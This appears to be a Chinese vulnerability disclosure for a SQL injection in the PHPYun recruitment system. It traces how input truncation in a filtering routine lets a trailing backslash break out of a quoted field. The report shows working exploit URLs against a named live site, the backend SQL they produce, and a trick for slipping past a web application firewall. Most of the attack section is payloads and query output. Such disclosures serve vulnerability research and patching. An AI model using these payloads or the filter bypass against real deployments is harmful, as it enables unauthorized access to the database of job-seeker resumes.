### 简要描述: PHP云人才系统某处设计缺陷导致的SQL注入 (最新版DEMO测试,同样适用低版本) ### 详细说明: 在文件/data/db.safety.php:193 ``` 193 foreach($_GET as $id=>$v){ 194 195 $str = html_entity_decode($v,ENT_QUOTES,"GB2312"); 196 197 $v = common_htmlspecialchars($id,$v,$str,$config); 198 safesql($id,$v,"GET",$config); 199 $id = sfkeyword($id,$config); 200 $v = sfkeyword($v,$config); 201 if(!is_array($v)) 202 $v=substr(strip_tags($v),0,80); 203 $_GET[$id]=$v; 204 } 205 206 foreach($_COOKIE as $id=>$v){ 207 208 $str = html_entity_decode($v,ENT_QUOTES,"GB2312"); 209 210 $v = common_htmlspecialchars($id,$v,$str,$config); 211 safesql($id,$v,"COOKIE",$config); 212 $id = sfkeyword($id,$config); 213 $v = sfkeyword($v,$config); 214 $v=substr(strip_tags($v),0,52); 215 $_COOKIE[$id]=$v; 216 } ``` 第202行直接substr(strip_tags($v),0,80),然后赋值给$_GET[$id],这里存在被截断,导致注入\, 如果GET后面的参数可控,即可SQL注入。 下面我们以WAP版的一个例子来说明,URL为: ``` http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=&report=&salary=&sex=&type=&uptime= ``` 这里各个参数基本都是使用'引号了. include/libs/Smarty_Compiler.class.php ``` 1713 function _complie_userlist_start($tag_args) 1714 { 1715 $paramer = $this->_parse_attrs($tag_args); 1716 $item = str_replace("'","",$paramer[item]); 1717 global $db,$db_config,$config; 1718 1719 $ParamerArr = $this->GetSmarty($paramer,$_GET); ...snip... 1887 1888 if($paramer['exp']){ 1889 $where .=" AND a.exp='".$paramer['exp']."'"; 1890 }else{ 1891 $where .=" AND a.exp>'0'"; 1892 } 1893 1894 if($paramer['edu']){ 1895 $where .=" AND a.edu='".$paramer['edu']."'"; 1896 }else{ 1897 $where .=" AND a.edu>'0'"; 1898 } 1899 1900 if($paramer['sex']) 1901 { 1902 $where .=" AND a.sex='".$paramer['sex']."'"; 1903 } 1904 ...snip... 1970 $user=$db->select_alls("resume","resume_expect",$where.$limit,"b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid"); ``` edu和sex是连续使用GET参数,前后都可控,所以我们构造一下这两个参数,edu正好是80位,sex随意: ``` http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=01234567890123456789012345678901234567890123456789012345678901234567890123456789&report=&salary=&sex=1&type=&uptime= ``` 后台执行的SQL为: ``` 2014-12-31 17:12:41SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='01234567890123456789012345678901234567890123456789012345678901234567890123456789' AND a.sex='1' ORDER BY b.lastupdate DESC 2014-12-31 17:12:41SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='01234567890123456789012345678901234567890123456789012345678901234567890123456789' AND a.sex='1' ORDER BY b.lastupdate DESC limit 0,20 ``` 我们把edu的最后以为替换为\,由于substr,最后面的\\变成了\,则执行的SQL语句为: ``` 2014-12-31 17:13:58SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='1' ORDER BY b.lastupdate DESC 2014-12-31 17:13:58SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='1' ORDER BY b.lastupdate DESC limit 0,20 ``` [<img src="https://images.seebug.org/upload/201412/311734378cc5727d39886868a39e95032d96b942.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311734378cc5727d39886868a39e95032d96b942.png) 接下来构造一下sex参数,由于/*!or*/会被安全狗拦截,使用||代替。sex为||1 limit 1# ``` http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=0123456789012345678901234567890123456789012345678901234567890123456789012345678\&report=&salary=&sex=||1%20limit%201%23&type=&uptime= ``` 显示1行数据(limit 1),后台执行的SQL为: ``` 2014-12-31 17:19:02SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 1#' ORDER BY b.lastupdate DESC 2014-12-31 17:19:02SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 1#' ORDER BY b.lastupdate DESC limit 0,20 ``` [<img src="https://images.seebug.org/upload/201412/31173552492668c9a925afe9a49641cc228f85ce.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31173552492668c9a925afe9a49641cc228f85ce.png) [<img src="https://images.seebug.org/upload/201412/311726237ab3d6f4167be51ae23a482f21aa29aa.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311726237ab3d6f4167be51ae23a482f21aa29aa.png) ``` http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=0123456789012345678901234567890123456789012345678901234567890123456789012345678\&report=&salary=&sex=||1%20limit%203%23&type=&uptime= ``` 显示3行数据(limit 3),后台执行的SQL为: ``` 2014-12-31 17:20:02SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 3#' ORDER BY b.lastupdate DESC 2014-12-31 17:20:02SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 3#' ORDER BY b.lastupdate DESC limit 0,20 ``` [<img src="https://images.seebug.org/upload/201412/31173603445b24e37261cb41cfc80a911a2dd5f4.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31173603445b24e37261cb41cfc80a911a2dd5f4.png) [<img src="https://images.seebug.org/upload/201412/31172632fdb25ae91f044553a2294e9d8abf0049.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31172632fdb25ae91f044553a2294e9d8abf0049.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201412/311726237ab3d6f4167be51ae23a482f21aa29aa.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311726237ab3d6f4167be51ae23a482f21aa29aa.png) [<img src="https://images.seebug.org/upload/201412/31172632fdb25ae91f044553a2294e9d8abf0049.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31172632fdb25ae91f044553a2294e9d8abf0049.png)
